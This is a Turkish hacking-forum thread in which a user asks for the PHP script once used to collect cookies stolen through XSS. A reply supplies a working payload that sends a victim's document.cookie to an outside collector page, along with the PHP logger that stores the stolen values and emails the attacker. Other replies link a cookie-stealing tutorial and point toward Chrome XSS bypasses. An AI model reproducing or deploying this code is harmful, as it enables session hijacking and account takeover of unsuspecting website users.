XSS İle Cookie Topladığımız Php Script ??

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    isbara
    isbara's avatar
    Kayıt Tarihi: 13/Aralık/2009
    Erkek

    arkadaşlar hani bir zamanlar sıkça xss ile cookie çaldığımız zamanlarda kullandığımız php bir script vardı şifreyle filan giriyorduk cookieler oraya birikiyordu

    o script temizinden elinde olan yada linki olan paylaşırsa makbule geçer

    bulamadım da

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    spyMASter
    spyMASter's avatar
    Kayıt Tarihi: 08/Ağustos/2005
    Erkek

    <SCRIPT> location.href='http://site.com/ekle.php?c='+escape(document. cookie)</SCRIPT> 

    Ekle.php kodları:

    <?php 

    $kayit = fopen("spymaster.txt","a"); 

    foreach($_GET as $variable => $value) { 

    fwrite($kayit,$variable . ": " . $value . "\n"); 

    fwrite($kayit,"---------------------------\n"); 

    fclose($kayit); 

    mail("spymaster@realhackers.net","keklik hazır","http://www.realhackers.net/spyoku.txt",'From: spymaster@realhackers.net'); 

    ?> 

  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    isbara
    isbara's avatar
    Kayıt Tarihi: 13/Aralık/2009
    Erkek

    hocam üstteki kodu bir .js nin içine koysak nasıl koyarız

    ayrıca nereye kaydediyor cookileri .txt nin içinden mi alacağım sadece benim dediğim script daha kapsamlıydı siliniyordu cookiler ekleniyordu vs

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    isbara
    isbara's avatar
    Kayıt Tarihi: 13/Aralık/2009
    Erkek

    https://www.go4expert.com/articles/stealing-cookie-xss-t17066/

    bu işe yarar kaynak sanırım bunu buldum benim gibi bilmeyenler için

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    biri
    biri's avatar
    Kayıt Tarihi: 03/Ocak/2009
    Erkek

    Chrome yemiyor artık hocam


    ¯\(ツ)/¯ ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Realist
    Realist's avatar
    Kayıt Tarihi: 13/Nisan/2007
    Erkek

    php cookie stealer olarak aratırsan bulabilirsin


    ..
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    isbara
    isbara's avatar
    Kayıt Tarihi: 13/Aralık/2009
    Erkek
    tolgasen bunu yazdı

    Chrome yemiyor artık hocam

    hadi be bu kötü oldu işte

  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    koray
    koray's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek

    chrome xss bypass yazıp güncel kodlara bakabilirsin hocam

  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    snnyk
    snnyk's avatar
    Kayıt Tarihi: 28/Mayıs/2007
    Erkek

    ben yazdığım özel bi sistemde cookileri ip adresi le şifreliyorum 

    dolayısıyla unutulan biryerde bilinçsiz bir kullanıcı cookie kaptırsada bi boka yaramıyor

     


    snnyk.com - code is poetry all that i know...
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    isbara
    isbara's avatar
    Kayıt Tarihi: 13/Aralık/2009
    Erkek
    snnyk bunu yazdı

    ben yazdığım özel bi sistemde cookileri ip adresi le şifreliyorum 

    dolayısıyla unutulan biryerde bilinçsiz bir kullanıcı cookie kaptırsada bi boka yaramıyor

     

    zaten cookie işini hazır sistemler için istiyorum özel kodlamalarda işe yaramayacağından eminim

  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    wasd
    wasd's avatar
    Kayıt Tarihi: 14/Haziran/2006
    Erkek
    snnyk bunu yazdı

    ben yazdığım özel bi sistemde cookileri ip adresi le şifreliyorum 

    dolayısıyla unutulan biryerde bilinçsiz bir kullanıcı cookie kaptırsada bi boka yaramıyor

     

    Gizliliğe dayalı güvenlik çok da güvenilir olmaz eğer ki saldırılabilecek bir sistemse. Hangi şifreleme yöntemi kullanıldığı bulunursa, parola olarak da ip adresi denenirse atlatmak zor değil.

    Ama tahminimce bi salt değeri falan fazladan birşeyler vardır =)


    :)
Toplam Hit: 4749 Toplam Mesaj: 13
xss cookie